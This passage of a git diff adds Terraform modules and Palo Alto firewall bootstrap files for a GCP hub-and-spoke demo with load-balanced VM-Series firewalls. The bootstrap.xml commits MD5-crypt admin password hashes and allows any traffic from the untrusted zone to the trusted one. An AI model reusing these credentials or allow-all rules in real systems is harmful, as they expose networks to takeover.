index 00000000..0519ecba
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/authcodes
@@ -0,0 +1 @@
+
\ No newline at end of file
diff --git a/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/bootstrap.xml b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/bootstrap.xml
new file mode 100644
index 00000000..90c524a9
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/bootstrap.xml
@@ -0,0 +1,706 @@
+
+
+
+
+
+ $1$eyegmtyu$VFbNwpbaZ8sUG40wpdo/A/
+
+
+ yes
+
+
+ c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGogcGdseW5u
+
+
+
+
+ yes
+
+
+ $1$xxqwnwvr$El9XN5KexgoltjkVjbkcd0
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 10
+
+
+ yes
+ 5
+
+
+
+ yes
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+
+
+ 100
+ yes
+
+
+
+
+
+
+
+
+
+
+
+
+
+ no
+
+
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+
+
+
+
+
+
+ no
+
+
+
+
+ no
+
+
+ no
+
+
+
+
+
+
+
+
+
+ no
+
+
+
+
+ health-check
+
+
+
+
+
+
+
+ 3
+ 5
+ wait-recover
+
+
+
+
+ no
+ yes
+
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+
+ 8
+
+
+
+
+ aes-128-cbc
+
+
+ sha256
+
+
+ group19
+
+
+ 8
+
+
+
+
+ aes-256-cbc
+
+
+ sha384
+
+
+ group20
+
+
+ 8
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+ 1
+
+
+
+
+
+ aes-128-gcm
+
+
+ none
+
+
+ group19
+
+ 1
+
+
+
+
+
+ aes-256-gcm
+
+
+ none
+
+
+ group20
+
+ 1
+
+
+
+
+
+
+ aes-128-cbc
+
+
+ sha1
+
+
+
+
+
+
+
+
+
+
+ real-time
+
+
+ high
+
+
+ high
+
+
+ medium
+
+
+ medium
+
+
+ low
+
+
+ low
+
+
+ low
+
+
+
+
+
+
+
+
+
+ no
+
+
+ 1.25
+ 0.5
+ 900
+ 300
+ 900
+ yes
+
+
+
+
+ yes
+
+
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+
+ ethernet1/1
+ ethernet1/2
+ loopback.1
+
+
+
+
+
+
+
+
+
+
+
+ no
+ any
+ 2
+
+
+ 192.168.2.1
+
+
+ None
+
+ ethernet1/1
+ 10
+ 35.191.0.0/16
+
+
+
+
+
+
+ no
+ any
+ 2
+
+
+ 192.168.2.1
+
+
+ None
+
+ ethernet1/1
+ 10
+ 130.211.0.0/22
+
+
+
+
+
+
+ no
+ any
+ 2
+
+
+ 192.168.2.1
+
+
+ None
+
+ ethernet1/1
+ 10
+ 10.10.1.0/24
+
+
+
+
+
+
+ no
+ any
+ 2
+
+
+ 192.168.2.1
+
+
+ None
+
+ ethernet1/1
+ 10
+ 10.10.2.0/24
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+ no
+ yes
+ no
+
+
+ updates.paloaltonetworks.com
+
+
+
+
+ wednesday
+ 01:02
+ download-only
+
+
+
+
+ US/Pacific
+
+ yes
+ yes
+
+ PA-VM
+
+
+
+ yes
+
+
+ FQDN
+
+
+
+ yes
+ no
+ yes
+ no
+
+
+ 8.8.8.8
+ 4.2.2.2
+ mgmt-interface-swap
+
+
+
+
+
+
+
+
+
+
+
+
+ ethernet1/1
+ loopback.1
+
+
+
+
+
+
+ ethernet1/2
+
+
+
+
+
+
+
+
+
+
+
+
+ trust
+
+
+ trust
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+ allow
+ universal
+ no
+
+
+
+ trust
+
+
+ trust
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+ allow
+ universal
+
+
+
+ untrust
+
+
+ trust
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+ allow
+
+
+
+
+
+
+ deny
+ no
+ yes
+
+
+ deny
+ no
+ yes
+
+
+
+
+
+
+
+ trust
+
+
+ trust
+
+
+
+ any
+
+ any
+ ethernet1/1
+
+ loopback-interface
+
+ No NAT on GCP LB health check.
+
+
+
+
+
+ ethernet1/2
+
+
+
+
+ untrust
+
+
+ trust
+
+
+
+ any
+
+ any
+
+
+
+
+
+
+
+ ethernet1/1
+ ethernet1/2
+ loopback.1
+
+
+
+
+
+ 35.191.0.0/16
+
+ gcp-resource
+
+
+
+ 130.211.0.0/22
+
+ gcp-resource
+
+
+
+ 100.64.0.1
+
+ gcp-resource
+
+ Loopback interface for GLB healthcheck
+
+
+
+
+
+ gcp-health-probe-1
+ gcp-health-probe-2
+
+
+ gcp-resource
+
+
+
+
+
+ color6
+
+
+ color13
+
+
+ color24
+
+
+
+
+
+
+
diff --git a/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/init-cfg.txt b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/init-cfg.txt
new file mode 100755
index 00000000..8d3c0290
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/init-cfg.txt
@@ -0,0 +1,10 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+dhcp-accept-server-hostname=yes
+dns-primary=8.8.8.8
+dns-secondary=4.2.2.2
+op-command-modes=mgmt-interface-swap
\ No newline at end of file
diff --git a/gcp/adv_peering_4fw_2spoke/diagram.png b/gcp/adv_peering_4fw_2spoke/diagram.png
new file mode 100644
index 00000000..f45262b1
Binary files /dev/null and b/gcp/adv_peering_4fw_2spoke/diagram.png differ
diff --git a/gcp/adv_peering_4fw_2spoke/fw_inbound.tf b/gcp/adv_peering_4fw_2spoke/fw_inbound.tf
new file mode 100644
index 00000000..717d691e
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/fw_inbound.tf
@@ -0,0 +1,76 @@
+#-----------------------------------------------------------------------------------------------
+# Create bootstrap bucket for inbound firewalls
+module "bootstrap_inbound" {
+ source = "./modules/gcp_bootstrap/"
+ bucket_name = "fw-bootstrap-inbound"
+ file_location = "bootstrap_files/fw_inbound/"
+ config = ["init-cfg.txt", "bootstrap.xml"]
+ license = ["authcodes"]
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create inbound firewalls
+module "fw_inbound" {
+ source = "./modules/vmseries/"
+ names = var.fw_names_inbound
+ zones = [
+ data.google_compute_zones.available.names[0],
+ data.google_compute_zones.available.names[1]
+ ]
+ subnetworks = [
+ module.vpc_untrust.subnetwork_self_link[0],
+ module.vpc_mgmt.subnetwork_self_link[0],
+ module.vpc_trust.subnetwork_self_link[0]
+ ]
+ machine_type = var.fw_machine_type
+ bootstrap_bucket = module.bootstrap_inbound.bucket_name
+ mgmt_interface_swap = "enable"
+ ssh_key = fileexists(var.public_key_path) ? "admin:${file(var.public_key_path)}" : ""
+ image = "${var.fw_image}-${var.fw_panos}"
+ nic0_public_ip = true
+ nic1_public_ip = true
+ nic2_public_ip = false
+ create_instance_group = true
+
+ dependencies = [
+ module.bootstrap_inbound.completion,
+ ]
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create public load balancer
+module "glb" {
+ source = "./modules/glb/"
+ name = var.glb_name
+ backends = {
+ "0" = [
+ {
+ group = module.fw_inbound.instance_group[0]
+ balancing_mode = null
+ capacity_scaler = null
+ description = null
+ max_connections = null
+ max_connections_per_instance = null
+ max_rate = null
+ max_rate_per_instance = null
+ max_utilization = null
+ },
+ {
+ group = module.fw_inbound.instance_group[1]
+ balancing_mode = null
+ capacity_scaler = null
+ description = null
+ max_connections = null
+ max_connections_per_instance = null
+ max_rate = null
+ max_rate_per_instance = null
+ max_utilization = null
+ }
+ ]
+ }
+ backend_params = [
+ // health check path, port name, port number, timeout seconds.
+ "/,http,80,10"
+ ]
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/fw_outbound.tf b/gcp/adv_peering_4fw_2spoke/fw_outbound.tf
new file mode 100644
index 00000000..b97e8281
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/fw_outbound.tf
@@ -0,0 +1,95 @@
+#-----------------------------------------------------------------------------------------------
+# Create bootstrap bucket for outbound firewalls
+module "bootstrap_outbound" {
+ source = "./modules/gcp_bootstrap/"
+ bucket_name = "fw-bootstrap-egress"
+ file_location = "bootstrap_files/fw_outbound/"
+ config = ["init-cfg.txt", "bootstrap.xml"]
+ license = ["authcodes"]
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create outbound firewalls
+module "fw_outbound" {
+ source = "./modules/vmseries/"
+ names = var.fw_names_outbound
+ zones = [
+ data.google_compute_zones.available.names[0],
+ data.google_compute_zones.available.names[1]
+ ]
+ subnetworks = [
+ module.vpc_trust.subnetwork_self_link[0],
+ module.vpc_mgmt.subnetwork_self_link[0],
+ module.vpc_untrust.subnetwork_self_link[0]
+ ]
+ machine_type = var.fw_machine_type
+ bootstrap_bucket = module.bootstrap_outbound.bucket_name
+ mgmt_interface_swap = "enable"
+ ssh_key = fileexists(var.public_key_path) ? "admin:${file(var.public_key_path)}" : ""
+ image = "${var.fw_image}-${var.fw_panos}"
+ nic0_public_ip = false
+ nic1_public_ip = true
+ nic2_public_ip = true
+ create_instance_group = true
+
+ dependencies = [
+ module.bootstrap_outbound.completion,
+ ]
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create 2 internal load balancers. LB-1 is active/active for internet-bound traffic. LB-2 is active/passive for east-west traffic.
+module "ilb" {
+ source = "./modules/ilb/"
+ name = var.ilb_name
+ subnetworks = [module.vpc_trust.subnetwork_self_link[0]]
+ all_ports = true
+ ports = []
+ health_check_port = "22"
+
+ backends = {
+ "0" = [
+ {
+ group = module.fw_outbound.instance_group[0]
+ failover = false
+ },
+ {
+ group = module.fw_outbound.instance_group[1]
+ failover = false
+ }
+ ],
+ "1" = [
+ {
+ group = module.fw_outbound.instance_group[0]
+ failover = false
+ },
+ {
+ group = module.fw_outbound.instance_group[1]
+ failover = true
+ }
+ ]
+ }
+ providers = {
+ google = google-beta
+ }
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create a default route to the internal LB. The route is exported to the spokes via VPC peering.
+resource "google_compute_route" "default" {
+ name = "${var.ilb_name}-default"
+ provider = google-beta
+ dest_range = "0.0.0.0/0"
+ network = module.vpc_trust.vpc_self_link
+ next_hop_ilb = module.ilb.forwarding_rule[0]
+ priority = 99
+}
+
+resource "google_compute_route" "eastwest" {
+ name = "${var.ilb_name}-eastwest"
+ provider = google-beta
+ dest_range = "10.10.0.0/16"
+ network = module.vpc_trust.vpc_self_link
+ next_hop_ilb = module.ilb.forwarding_rule[1]
+ priority = 99
+}
diff --git a/gcp/adv_peering_4fw_2spoke/fw_vpc.tf b/gcp/adv_peering_4fw_2spoke/fw_vpc.tf
new file mode 100644
index 00000000..a1f096eb
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/fw_vpc.tf
@@ -0,0 +1,35 @@
+#-----------------------------------------------------------------------------------------------
+# Create firewall VPCs & subnets
+module "vpc_mgmt" {
+ source = "./modules/vpc/"
+
+ vpc = var.mgmt_vpc
+ subnets = var.mgmt_subnet
+ cidrs = var.mgmt_cidr
+ regions = [var.region]
+ allowed_sources = var.mgmt_sources
+ allowed_protocol = "TCP"
+ allowed_ports = ["443", "22"]
+}
+
+module "vpc_untrust" {
+ source = "./modules/vpc/"
+
+ vpc = var.untrust_vpc
+ subnets = var.untrust_subnet
+ cidrs = var.untrust_cidr
+ regions = [var.region]
+ allowed_sources = ["0.0.0.0/0"]
+}
+
+module "vpc_trust" {
+ source = "./modules/vpc/"
+
+ vpc = var.trust_vpc
+ subnets = var.trust_subnet
+ cidrs = var.trust_cidr
+ regions = [var.region]
+ allowed_sources = ["0.0.0.0/0"]
+ delete_default_route = true
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/guide.pdf b/gcp/adv_peering_4fw_2spoke/guide.pdf
new file mode 100644
index 00000000..8b4b69e6
Binary files /dev/null and b/gcp/adv_peering_4fw_2spoke/guide.pdf differ
diff --git a/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/main.tf b/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/main.tf
new file mode 100644
index 00000000..a93e7956
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/main.tf
@@ -0,0 +1,85 @@
+locals {
+ bucket_name = join("", [var.bucket_name, random_string.randomstring.result])
+}
+resource "random_string" "randomstring" {
+ length = 25
+ min_lower = 15
+ min_numeric = 10
+ special = false
+}
+
+resource "google_storage_bucket" "bootstrap" {
+ name = local.bucket_name
+ force_destroy = true
+}
+
+resource "google_storage_bucket_object" "config_full" {
+ count = length(var.config) > 0 ? length(var.config) : "0"
+ name = "config/${element(var.config, count.index)}"
+ source = "${var.file_location}${element(var.config, count.index)}"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "content_full" {
+ count = length(var.content) > 0 ? length(var.content) : "0"
+ name = "content/${element(var.content, count.index)}"
+ source = "${var.file_location}${element(var.content, count.index)}"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "license_full" {
+ count = length(var.license) > 0 ? length(var.license) : "0"
+ name = "license/${element(var.license, count.index)}"
+ source = "${var.file_location}${element(var.license, count.index)}"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "software_full" {
+ count = length(var.software) > 0 ? length(var.software) : "0"
+ name = "software/${element(var.software, count.index)}"
+ source = "${var.file_location}${element(var.software, count.index)}"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "config_empty" {
+ count = length(var.config) == 0 ? 1 : 0
+ name = "config/"
+ content = "config/"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "content_empty" {
+ count = length(var.content) == 0 ? 1 : 0
+ name = "content/"
+ content = "content/"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "license_empty" {
+ count = length(var.license) == 0 ? 1 : 0
+ name = "license/"
+ content = "license/"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "software_empty" {
+ count = length(var.software) == 0 ? 1 : 0
+ name = "software/"
+ content = "software/"
+ bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "null_resource" "dependency_setter" {
+ depends_on = [
+ google_storage_bucket.bootstrap,
+ google_storage_bucket_object.config_full,
+ google_storage_bucket_object.content_full,
+ google_storage_bucket_object.license_full,
+ google_storage_bucket_object.software_full,
+ google_storage_bucket_object.config_empty,
+ google_storage_bucket_object.content_empty,
+ google_storage_bucket_object.license_empty,
+ google_storage_bucket_object.software_empty,
+ ]
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/outputs.tf b/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/outputs.tf
new file mode 100644
index 00000000..3697edba
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/outputs.tf
@@ -0,0 +1,8 @@
+output "completion" {
+ value = null_resource.dependency_setter.id
+}
+
+output "bucket_name" {
+ value = google_storage_bucket.bootstrap.name
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/variables.tf b/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/variables.tf
new file mode 100644
index 00000000..ebe6f1de
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/variables.tf
@@ -0,0 +1,24 @@
+variable "bucket_name" {
+}
+
+variable "file_location" {
+}
+
+variable "config" {
+ type = list(string)
+ default = []
+}
+
+variable "content" {
+ type = list(string)
+ default = []
+}
+
+variable "license" {
+ type = list(string)
+ default = []
+}
+
+variable "software" {
+ default = []
+}
diff --git a/gcp/adv_peering_4fw_2spoke/modules/glb/main.tf b/gcp/adv_peering_4fw_2spoke/modules/glb/main.tf
new file mode 100644
index 00000000..bbfa03d6
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/glb/main.tf
@@ -0,0 +1,89 @@
+resource "google_compute_global_forwarding_rule" "http" {
+ count = var.http_forward ? 1 : 0
+ name = "${var.name}-http"
+ target = google_compute_target_http_proxy.default[0].self_link
+ ip_address = google_compute_global_address.default.address
+ port_range = "80"
+}
+
+resource "google_compute_global_forwarding_rule" "https" {
+ count = var.ssl ? 1 : 0
+ name = "${var.name}-https"
+ target = google_compute_target_https_proxy.default[0].self_link
+ ip_address = google_compute_global_address.default.address
+ port_range = "443"
+}
+
+resource "google_compute_global_address" "default" {
+ name = "${var.name}-address"
+ ip_version = var.ip_version
+}
+
+# HTTP proxy when ssl is false
+resource "google_compute_target_http_proxy" "default" {
+ count = var.http_forward ? 1 : 0
+ name = "${var.name}-http-proxy"
+ url_map = compact(
+ concat([
+ var.url_map], google_compute_url_map.default.*.self_link),
+ )[0]
+}
+# HTTPS proxy when ssl is true
+resource "google_compute_target_https_proxy" "default" {
+ count = var.ssl ? 1 : 0
+ name = "${var.name}-https-proxy"
+ url_map = compact(
+ concat([
+ var.url_map], google_compute_url_map.default.*.self_link), )[0]
+ ssl_certificates = compact(concat(var.ssl_certificates, google_compute_ssl_certificate.default.*.self_link, ), )
+}
+
+resource "google_compute_ssl_certificate" "default" {
+ count = var.ssl && ! var.use_ssl_certificates ? 1 : 0
+ name_prefix = "${var.name}-certificate"
+ private_key = var.private_key
+ certificate = var.certificate
+
+ lifecycle {
+ create_before_destroy = true
+ }
+}
+
+resource "google_compute_url_map" "default" {
+ count = var.create_url_map ? 1 : 0
+ name = var.name
+ default_service = google_compute_backend_service.default[0].self_link
+}
+
+resource "google_compute_backend_service" "default" {
+ count = length(var.backend_params)
+ name = "${var.name}-${count.index}"
+ port_name = split(",", var.backend_params[count.index])[1]
+ protocol = var.backend_protocol
+ timeout_sec = split(",", var.backend_params[count.index])[3]
+ dynamic "backend" {
+ for_each = var.backends[count.index]
+ content {
+ balancing_mode = lookup(backend.value, "balancing_mode")
+ capacity_scaler = lookup(backend.value, "capacity_scaler")
+ description = lookup(backend.value, "description")
+ group = lookup(backend.value, "group")
+ max_connections = lookup(backend.value, "max_connections")
+ max_connections_per_instance = lookup(backend.value, "max_connections_per_instance")
+ max_rate = lookup(backend.value, "max_rate")
+ max_rate_per_instance = lookup(backend.value, "max_rate_per_instance")
+ max_utilization = lookup(backend.value, "max_utilization")
+ }
+ }
+ health_checks = [
+ google_compute_http_health_check.default[count.index].self_link]
+ security_policy = var.security_policy
+ enable_cdn = var.cdn
+}
+
+resource "google_compute_http_health_check" "default" {
+ count = length(var.backend_params)
+ name = "${var.name}-check-${count.index}"
+ request_path = split(",", var.backend_params[count.index])[0]
+ port = split(",", var.backend_params[count.index])[2]
+}
diff --git a/gcp/adv_peering_4fw_2spoke/modules/glb/outputs.tf b/gcp/adv_peering_4fw_2spoke/modules/glb/outputs.tf
new file mode 100644
index 00000000..3c1a64f7
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/glb/outputs.tf
@@ -0,0 +1,4 @@
+output "address" {
+ value = google_compute_global_address.default.address
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/modules/glb/variables.tf b/gcp/adv_peering_4fw_2spoke/modules/glb/variables.tf
new file mode 100644
index 00000000..742bedfb
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/glb/variables.tf
@@ -0,0 +1,95 @@
+variable "ip_version" {
+ description = "IP version for the Global address (IPv4 or v6) - Empty defaults to IPV4"
+ type = string
+ default = ""
+}
+
+variable "name" {
+ description = "Name for the forwarding rule and prefix for supporting resources"
+ type = string
+}
+
+variable "backends" {
+ description = "Map backend indices to list of backend maps."
+ type = map(list(object({
+ group = string
+ balancing_mode = string
+ capacity_scaler = number
+ description = string
+ max_connections = number
+ max_connections_per_instance = number
+ max_rate = number
+ max_rate_per_instance = number
+ max_utilization = number
+ })))
+}
+
+variable "backend_params" {
+ description = "Comma-separated encoded list of parameters in order: health check path, service port name, service port, backend timeout seconds"
+ type = list(string)
+}
+
+variable "backend_protocol" {
+ description = "The protocol with which to talk to the backend service"
+ default = "HTTP"
+}
+
+variable "create_url_map" {
+ description = "Set to `false` if url_map variable is provided."
+ type = bool
+ default = true
+}
+
+variable "url_map" {
+ description = "The url_map resource to use. Default is to send all traffic to first backend."
+ type = string
+ default = ""
+}
+
+variable "http_forward" {
+ description = "Set to `false` to disable HTTP port 80 forward"
+ type = bool
+ default = true
+}
+
+variable "ssl" {
+ description = "Set to `true` to enable SSL support, requires variable `ssl_certificates` - a list of self_link certs"
+ type = bool
+ default = false
+}
+
+variable "private_key" {
+ description = "Content of the private SSL key. Required if `ssl` is `true` and `ssl_certificates` is empty."
+ type = string
+ default = ""
+}
+
+variable "certificate" {
+ description = "Content of the SSL certificate. Required if `ssl` is `true` and `ssl_certificates` is empty."
+ type = string
+ default = ""
+}
+
+variable "use_ssl_certificates" {
+ description = "If true, use the certificates provided by `ssl_certificates`, otherwise, create cert from `private_key` and `certificate`"
+ type = bool
+ default = false
+}
+
+variable "ssl_certificates" {
+ description = "SSL cert self_link list. Required if `ssl` is `true` and no `private_key` and `certificate` is provided."
+ type = list(string)
+ default = []
+}
+
+variable "security_policy" {
+ description = "The resource URL for the security policy to associate with the backend service"
+ type = string
+ default = ""
+}
+
+variable "cdn" {
+ description = "Set to `true` to enable cdn on backend."
+ type = bool
+ default = false
+}
\ No newline at end of file
diff --git a/gcp/adv_peering_4fw_2spoke/modules/ilb/main.tf b/gcp/adv_peering_4fw_2spoke/modules/ilb/main.tf
new file mode 100755
index 00000000..fee6e098
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/ilb/main.tf
@@ -0,0 +1,33 @@
+resource "google_compute_health_check" "default" {
+ name = "${var.name}-check-0"
+
+ tcp_health_check {
+ port = var.health_check_port
+ }
+}
+resource "google_compute_region_backend_service" "default" {
+ count = length(var.backends)
+ name = "${var.name}-${count.index}"
+ health_checks = [google_compute_health_check.default.self_link]
+
+ dynamic "backend" {
+ for_each = var.backends[count.index]
+ content {
+ group = lookup(backend.value, "group")
+ failover = lookup(backend.value, "failover")
+ }
+ }
+ session_affinity = "NONE"
+}
+
+resource "google_compute_forwarding_rule" "default" {
+ count = length(var.backends)
+ name = "${var.name}-all-${count.index}"
+ load_balancing_scheme = "INTERNAL"
+ ip_address = var.ip_address
+ ip_protocol = var.ip_protocol
+ all_ports = var.all_ports
+ ports = var.ports
+ subnetwork = var.subnetworks[0]
+ backend_service = google_compute_region_backend_service.default[count.index].self_link
+}
diff --git a/gcp/adv_peering_4fw_2spoke/modules/ilb/outputs.tf b/gcp/adv_peering_4fw_2spoke/modules/ilb/outputs.tf
new file mode 100644
index 00000000..2e1b10ef
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/ilb/outputs.tf
@@ -0,0 +1,4 @@
+output "forwarding_rule" {
+ value = google_compute_forwarding_rule.default.*.self_link
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/modules/ilb/variables.tf b/gcp/adv_peering_4fw_2spoke/modules/ilb/variables.tf
new file mode 100644
index 00000000..f6bbeb80
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/ilb/variables.tf
@@ -0,0 +1,33 @@
+variable "name" {
+}
+
+variable "health_check_port" {
+ default = "22"
+}
+
+variable "backends" {
+ description = "Map backend indices to list of backend maps."
+ type = map(list(object({
+ group = string
+ failover = bool
+ })))
+}
+
+variable "subnetworks" {
+ type = list(string)
+}
+
+variable "ip_address" {
+ default = null
+}
+
+variable "ip_protocol" {
+ default = "TCP"
+}
+variable "all_ports" {
+ type = bool
+}
+variable "ports" {
+ type = list(string)
+ default = []
+}
diff --git a/gcp/adv_peering_4fw_2spoke/modules/vm/main.tf b/gcp/adv_peering_4fw_2spoke/modules/vm/main.tf
new file mode 100644
index 00000000..2f42125b
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/vm/main.tf
@@ -0,0 +1,45 @@
+resource "google_compute_instance" "default" {
+ count = length(var.names)
+ name = element(var.names, count.index)
+ machine_type = var.machine_type
+ zone = element(var.zones, count.index)
+ can_ip_forward = true
+ allow_stopping_for_update = true
+ metadata_startup_script = var.startup_script
+
+ metadata = {
+ serial-port-enable = true
+ ssh-keys = var.ssh_key
+ }
+
+ network_interface {
+ subnetwork = element(var.subnetworks, count.index)
+ }
+
+ boot_disk {
+ initialize_params {
+ image = var.image
+ }
+ }
+
+ service_account {
+ scopes = var.scopes
+ }
+}
+
+
+resource "google_compute_instance_group" "default" {
+ count = var.create_instance_group ? length(var.names) : 0
+ name = "${element(var.names, count.index)}-${element(var.zones, count.index)}-ig"
+ zone = element(var.zones, count.index)
+ instances = [google_compute_instance.default[count.index].self_link]
+
+ named_port {
+ name = "http"
+ port = "80"
+ }
+
+ lifecycle {
+ create_before_destroy = true
+ }
+}
diff --git a/gcp/adv_peering_4fw_2spoke/modules/vm/outputs.tf b/gcp/adv_peering_4fw_2spoke/modules/vm/outputs.tf
new file mode 100644
index 00000000..a5c49887
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/vm/outputs.tf
@@ -0,0 +1,11 @@
+output "vm_names" {
+ value = google_compute_instance.default.*.name
+}
+
+output "vm_self_link" {
+ value = google_compute_instance.default.*.self_link
+}
+
+output "instance_group" {
+ value = google_compute_instance_group.default.*.self_link
+}
diff --git a/gcp/adv_peering_4fw_2spoke/modules/vm/variables.tf b/gcp/adv_peering_4fw_2spoke/modules/vm/variables.tf
new file mode 100644
index 00000000..102808ff
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/vm/variables.tf
@@ -0,0 +1,43 @@
+variable "names" {
+ type = list(string)
+}
+
+variable "machine_type" {
+}
+variable "create_instance_group" {
+ type = bool
+ default = false
+}
+
+variable "instance_group_names" {
+ type = list(string)
+ default = ["vmseries-instance-group"]
+}
+variable "zones" {
+ type = list(string)
+}
+variable "ssh_key" {
+ default = ""
+}
+variable "image" {
+}
+
+variable "subnetworks" {
+ type = list(string)
+}
+
+variable "scopes" {
+ type = list(string)
+
+ default = [
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+}
+
+variable "startup_script" {
+ default = ""
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/modules/vmseries/main.tf b/gcp/adv_peering_4fw_2spoke/modules/vmseries/main.tf
new file mode 100644
index 00000000..c74ee4fa
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/vmseries/main.tf
@@ -0,0 +1,83 @@
+resource "null_resource" "dependency_getter" {
+ provisioner "local-exec" {
+ command = "echo ${length(var.dependencies)}"
+ }
+}
+
+resource "google_compute_instance" "vmseries" {
+ count = length(var.names)
+ name = element(var.names, count.index)
+ machine_type = var.machine_type
+ zone = element(var.zones, count.index)
+ min_cpu_platform = var.cpu_platform
+ can_ip_forward = true
+ allow_stopping_for_update = true
+ tags = var.tags
+
+ metadata = {
+ mgmt-interface-swap = var.mgmt_interface_swap
+ vmseries-bootstrap-gce-storagebucket = var.bootstrap_bucket
+ serial-port-enable = true
+ ssh-keys = var.ssh_key
+ }
+
+ service_account {
+ scopes = var.scopes
+ }
+
+ network_interface {
+
+ dynamic "access_config" {
+ for_each = var.nic0_public_ip ? [""] : []
+ content {}
+ }
+ network_ip = element(var.nic0_ip, count.index)
+ subnetwork = var.subnetworks[0]
+ }
+
+ network_interface {
+ dynamic "access_config" {
+ for_each = var.nic1_public_ip ? [""] : []
+ content {}
+ }
+ network_ip = element(var.nic1_ip, count.index)
+ subnetwork = var.subnetworks[1]
+ }
+
+ network_interface {
+ dynamic "access_config" {
+ for_each = var.nic2_public_ip ? [""] : []
+ content {}
+ }
+ network_ip = element(var.nic2_ip, count.index)
+ subnetwork = var.subnetworks[2]
+ }
+
+ boot_disk {
+ initialize_params {
+ image = var.image
+ type = var.disk_type
+ }
+ }
+
+ depends_on = [
+ null_resource.dependency_getter
+ ]
+}
+
+resource "google_compute_instance_group" "vmseries" {
+ count = var.create_instance_group ? length(var.names) : 0
